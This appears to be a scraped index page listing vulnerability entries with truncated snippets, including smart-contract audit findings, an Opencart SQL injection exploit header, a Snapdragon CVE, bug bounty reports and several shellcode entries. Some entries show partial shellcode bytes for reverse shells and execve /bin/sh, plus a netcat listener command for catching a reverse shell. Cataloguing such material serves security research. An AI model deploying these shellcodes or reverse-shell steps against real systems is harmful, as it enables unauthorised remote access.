isContract() is not a reliable way of checking if the input is an EOA
Lines of code Vulnerability details Impact depositIntoStrategyWithSignature is checking if the msg.sender is EOA or the contract and it is doing it by checking isContract, which is not right Proof of Concept The isContract check can be passed even if msg.sender is a smart contract if Function ...
Unsafe ERC20 operations due to lack of contract length check
Lines of code Vulnerability details Impact Functions executeERC20DirectTransfer and executeERC20TransferFrom replicate solmate library methods. The problem with this is that these functions do not check existence of code at the token address. If executeERC20DirectTransferand...
Contract LooksRareAggregator does not verify the proxy has code when delegatecall() is called on the proxy
Lines of code Vulnerability details Impact Delegatecall will return ‘True’ for the status value if it is called on an address that is not a contract and so has no code. This can cause bugs if code expects delegatecall functions to return False when they have to perform special logic. If, for some...
Doesn’t check order.baseAsset.code when exercising call order
Lines of code Vulnerability details Impact It is safe to check order.baseAsset.code.length and token.code.length in fillOrder and transferERC20sIn. Because SafeTransferLib doesn’t check whether the erc20 token is actually a contract. /// @dev Note that none of the functions in this library check...
Opencart 3 Extension TMD Vendor System SQL Injection
Exploit Title: Opencart 3 Extension TMD Vendor System - Blind SQL Injection Author: Muhammad Zaki Sulistya [email protected] Date: 03-11-2021 Product: TMD Vendor System Vendor Homepage: https://www.opencartextensions.in/ Software Link:...
CVE-2018-11955
Lack of check on length of reason-code fetched from payload may lead driver access the memory not allocated to the frame and results in out of bound read in Snapdragon Auto, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdrago...
Legal Robot: Lengthy manual entry of 2FA secret
Hello @team, I would like to report on some issue where users are going to face while 2FA authentication. We can see that users need to enter 52 bit code manually for 2FA authentication, which is taking a lot of time and it will be difficult for the user to enter the total 52 bits in the google...
Veris: Password(s) can be found via login process.
Hello security team, It is possible to find passwords of other users by enumerating the login process. The scenario is quite simple: 1 Go to https://sandbox.veris.in/portal/login/ 2 Fill in 'Email ID' and 'Password' and click 'Log In' 3 Capture the request via burp suite and send it to intruder. 4...
Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (1) (122 bytes)
/--------------------------------------------------------------------------------------------------------------------- / Title: tcp reverse shell with password polymorphic version 122 bytes Author: Sathish kumar Contact: https://www.linkedin.com/in/sathish94 Copyright: c 2016 iQube. http://iQube....
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)
Linux/x86-64 - Add Map 127.1.1.1 google.lk In /etc/hosts Shellcode 110 bytes. Shellcode exploit for Linux/x86-64 platform / ; Title: Add map in /etc/hosts file - 110 bytes ; Date: 2014-10-29 ; Platform: linux/x8664 ; Website: http://osandamalith.wordpress.com ; Author: Osanda Malith Jayathissa...
bsd/x86 reverse portbind 129 bytes
No description provided by source. / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on 6969/tcp / / [email protected] / char shellcode = 0x31,0xc9,0x51,0x41, ...
linux/x86 Magic Byte Self Modifying Code 76 bytes
Exploit for linux/x86 platform in category shellcode ================================================= linux/x86 Magic Byte Self Modifying Code 76 bytes ================================================= /-------------------------------------------------------/ / Magic Byte Self Modifying Code for...
freebsd/x86 execve /bin/sh 37 bytes
No description provided by source. / This is FreeBSD execve code. It is 37 bytes long. I'll try to make it smaller. Till then use this one. signed predator preedatoratsendmaildotru / char FreeBSDcode= "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x50\x8d"...
linux chroot()/execve() code
Exploit for linux/x86 platform in category shellcode ============================ linux chroot/execve code ============================ / This is Linux chroot/execve code. It is 80 bytes long. I have some ideas how to make it smaller, but till then use this one. signed predator linux registered use...